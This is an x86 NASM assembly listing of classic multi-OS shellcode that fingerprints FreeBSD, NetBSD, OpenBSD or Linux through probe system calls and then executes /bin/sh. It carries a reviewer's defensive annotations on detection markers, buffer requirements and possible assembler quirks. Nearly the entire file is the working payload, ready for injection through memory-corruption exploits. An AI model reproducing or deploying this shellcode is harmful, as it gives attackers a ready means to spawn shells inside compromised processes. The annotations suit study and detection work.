BITS 32
; Assembly code that can do an execve of /bin/sh on multiple operating
; systems. This code has been tested to work on the following systems:
;
; FreeBSD 4.6-PRERELEASE
; FreeBSD 4.5-RELEASE
; OpenBSD 3.0
; NetBSD 1.5.2
; Linux 2.0.36
; Linux 2.2.12-20
; Linux 2.2.16-22
; Linux 2.4.7-xfs
;
; It should work on older OS versions as well except for OpenBSD. The
; system call that is used to distinguish OpenBSD from NetBSD and FreeBSD
; is relatively new (thanks!). It might be possible to find a difference
; between newer and older OpenBSD versions but I would rather spend the time
; on finding a better way to fingerprint the operating system.
;
; Written by zillion (safemode.org) more details: http://safemode.org
;
; NOTE(review) - reader's / defender's notes on this listing:
;  - Syntax: NASM, 32-bit, position independent. The jmp-short / call /
;    pop esi sequence makes esi point at the `db '/bin/sh'` bytes that
;    sit right after the `call`; every data access below is esi-relative.
;  - The embedded data is only 7 bytes plus the NUL written at [esi + 7].
;    The freenetbsd and linux paths additionally store two dwords at
;    [esi + 8] and [esi + 12], i.e. 8 bytes PAST the end of this code, so
;    the payload requires a writable buffer with slack behind it.
;  - Static markers of this payload family are the '/bin/sh' literal, the
;    jmp/call/pop esi self-location idiom and the bare `int 0x80` stubs;
;    the behavioural marker is an execve of /bin/sh by a process that has
;    no business spawning a shell.
;  - Operand-size keywords: `long` is not one of NASM's documented size
;    keywords (`dword` is), and a size keyword on a register operand
;    (`mov byte al, ...`) is at best ignored - confirm both assemble on
;    the NASM version in use.
;  - BSD int 0x80 convention: arguments are read from the stack above one
;    dummy dword (normally the return address of a libc stub); the final
;    `push eax` before each BSD `int 0x80` supplies that dummy slot.
;    Linux takes its arguments in ebx/ecx/edx instead.

        jmp     short callit

doit:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Basic string manipulation
        pop     esi                     ; esi = &'/bin/sh' (the bytes after `call doit`)
        xor     eax, eax
        mov     byte [esi + 7], al      ; NUL-terminate the 7-byte string

;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; The os selector
; Two probe syscalls whose numbers mean different things on each kernel;
; the sign / zero-ness of the result selects the branch. The specific
; meaning of 39 and 272 per OS is not stated here - see the header.
        xor     eax, eax
        xor     ebx, ebx
        mov     al,39                   ; probe 1: syscall 39, ebx = 0
        int     0x80
        test    eax,eax
        js      linux                   ; negative result -> Linux path
        xor     eax, eax
        xor     ebx,ebx
        mov     ax, 272                 ; probe 2: syscall 272, ebx = 0
        int     0x80
        test    eax,eax
        jnz     freenetbsd              ; non-zero -> FreeBSD/NetBSD; zero falls into openbsd

openbsd:
; execve(path, argv, envp) via the BSD stack convention.
; Unlike the two paths below, no pointer array is built here: the argv
; slot receives esi + 5, the address of the "sh" bytes inside the string.
        xor     eax,eax
        xor     ebx,ebx
        push    eax                     ; envp = NULL
        lea     ebx,[esi + 5]
        push    ebx                     ; argv slot = esi + 5 (see note above)
        push    esi                     ; path = "/bin/sh"
        mov     al,59                   ; syscall 59
        push    eax                     ; dummy return-address slot
        int     0x80

freenetbsd:
; Build argv = { "/bin/sh", NULL } at [esi + 8], then execve via the
; BSD stack convention.
        xor     eax,eax
        lea     ebx, [esi]              ; ebx = esi (address of the string)
        mov     long [esi + 8], ebx     ; argv[0] = "/bin/sh"   (see `long` note)
        mov     long [esi + 12], eax    ; argv[1] = NULL
        push    eax                     ; envp = NULL
        lea     ecx, [esi + 8]
        push    ecx                     ; argv
        push    esi                     ; path
        mov     al,59                   ; syscall 59
        push    eax                     ; dummy return-address slot
        int     0x80

linux:
; Same argv array as above; Linux i386 takes execve arguments in
; ebx = path, ecx = argv, edx = envp, syscall number in eax (0x0b).
        xor     eax,eax
        lea     ebx, [esi]              ; ebx = esi
        mov     long [esi + 8], ebx     ; argv[0] = "/bin/sh"   (see `long` note)
        mov     long [esi + 12], eax    ; argv[1] = NULL
        mov     byte al, 0x0b           ; syscall 0x0b (see size-keyword note)
        mov     ebx, esi                ; path
        lea     ecx, [esi + 8]          ; argv
        lea     edx, [esi + 12]         ; envp -> the zero dword, i.e. an empty array
        int     0x80

callit:
        call    doit                    ; pushes the address of the string below
        db      '/bin/sh'               ; 7 bytes; the NUL is written at run time